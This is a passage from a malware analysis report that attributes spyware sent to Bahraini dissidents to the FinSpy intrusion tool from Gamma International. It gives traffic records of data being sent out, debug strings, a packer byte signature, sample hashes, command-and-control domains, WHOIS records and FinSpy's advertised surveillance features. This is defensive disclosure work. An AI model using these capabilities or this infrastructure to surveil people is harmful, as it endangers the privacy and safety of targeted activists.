Based on observation of an infected machine we were able to determine that the majority of data is exfiltrated
to the remote host via ports 443 and 4111.
192.168.131.65:1213 -> 77.69.140.194:443 1270075 bytes
192.168.131.65:4111 -> 77.69.149.194:4111 4766223 bytes
CONCLUSIONS ABOUT MALWARE IDENTIFICATION
Our analysis yields indicators about the identity of the malware we have analyzed: (1) debug strings found in
the memory of infected processes appear to identify the product and (2) the samples have similarities with
malware that communicates with domains belonging to Gamma International.
Debug Strings found in memory
As we previously noted, infected processes were found containing strings that include “finspyv4.01”
and “finspyv2”:
y:\lsvn_branches\finspyv4.01\finspyv2\src\libs\libgmp\mpn-tdiv_qr.c
y:\lsvn_branches\finspyv4.01\finspyv2\src\libs\libgmp\mpn-mul_fft.c
y:\lsvn_branches\finspyv4.01\finspyv2\src\target\bootkit_x32driver\objfre_w2k_x86\i386\bootkit_x32driver.pdb
Publicly available descriptions of the FinSpy tool collected by Privacy International among others and
posted on Wikileaks8 make a series of claims about functionality:
• Bypassing of 40 regularly tested Antivirus Systems
• Covert Communication with Headquarters
• Full Skype Monitoring (Calls, Chats, File Transfers, Video, Contact List)
• Recording of common communication like Email, Chats and Voice-over-IP
• Live Surveillance through Webcam and Microphone
• Country Tracing of Target
• Silent Extracting of Files from Hard-Disk
• Process-based Key-logger for faster analysis
• Live Remote Forensics on Target System
• Advanced Filters to record only important information
• Supports most common Operating Systems (Windows, Mac OSX and Linux)
Shared behavior with a sample that communicates with Gamma
The virtual machine used by the packer has very special sequences in order to execute the virtualised
code, for example:
66 C7 07 9D 61 mov word ptr [edi], 619Dh
C6 47 02 68 mov byte ptr [edi+2], 68h
89 57 03 mov [edi+3], edx
C7 47 07 68 00 00 00 mov dword ptr [edi+7], 68h
89 47 08 mov [edi+8], eax
C6 47 0C C3 mov byte ptr [edi+0Ch], 0C3h
Based on this we created a signature from the Bahraini malware, which we shared with another security
researcher who identified a sample that shared similar virtualised obfuscation. That sample is:
md5: c488a8aaef0df577efdf1b501611ec20
sha1: 5ea6ae50063da8354e8500d02d0621f643827346
sha256: 81531ce5a248aead7cda76dd300f303dafe6f1b7a4c953ca4d7a9a27b5cd6cdf
The sample connects to the following domains:
tiger.gamma-international.de
ff-demo.blogdns.org
The domain tiger.gamma-international.de has the following Whois information9:
Domain: gamma-international.de
Name: Martin Muench
Organisation: Gamma International GmbH
Address: Baierbrunner Str. 15
PostalCode: 81379
City: Munich
CountryCode: DE
Phone: +49-89-2420918-0
Fax: +49-89-2420918-1
Email: info@gamma-international.de
Changed: 2011-04-04T11:24:20+02:00
Martin Muench is a representative of Gamma International, a company that sells “advanced technical
surveillance and monitoring solutions”. One of the services they provide is FinFisher: IT Intrusion,
including the FinSpy tool. This labelling indicates that the matching sample we were provided may be
a demo copy of a FinFisher product, per the domain ff-demo.blogdns.org.
We have linked a set of novel virtualised code obfuscation techniques in our Bahraini samples to
another binary that communicates with Gamma International IP addresses. Taken alongside the
explicit use of the name “FinSpy” in debug strings found in infected processes, we suspect that the
malware is the FinSpy remote intrusion tool. This evidence appears to be consistent with the theory
that the dissidents in Bahrain who received these e-mails were targeted with the FinSpy tool,
configured to exfiltrate their harvested information to servers in Bahraini IP space. If this is not the
case, we invite Gamma International to explain.
RECOMMENDATIONS
The samples from email attachments have been shared with selected individuals within the security
community, and we strongly urge antivirus companies and security researchers to continue where we have left
off.
Be wary of opening unsolicited attachments received via email, Skype or any other communications
mechanism. If you believe that you are being targeted, it pays to be especially cautious when downloading
files over the Internet, even from links that are purportedly sent by friends.
ACKNOWLEDGEMENTS
Malware analysis by Morgan Marquis-Boire and Bill Marczak. Assistance from Seth Hardy and Harry Tuttle
gratefully received.
Special thanks to John Scott-Railton.
Thanks to Marcia Hofmann and the Electronic Frontier Foundation (EFF).
We would also like to acknowledge Privacy International for their continued work and graciously provided
background information on Gamma International.
FOOTNOTES
1. http://www.finfisher.com/
2. http://owni.eu/2011/12/15/finfisher-for-all-your-intrusive-surveillance-needs/#SpyFiles
3. http://blogs.aljazeera.com/profile/melissa-chan
4. This technique was used in the recent Madi malware attacks.
5. http://www.finfisher.com/
6. Unpacking Virtualised Obfuscators by Rolf Rolles – http://static.usenix.org/event/woot09/tech/full_papers/rolles.pdf
7. http://whois.domaintools.com/77.69.140.194
8. E.g. http://wikileaks.org/spyfiles/files/0/289_GAMMA-201110-FinSpy.pdf
9. http://whois.domaintools.com/gamma-international.de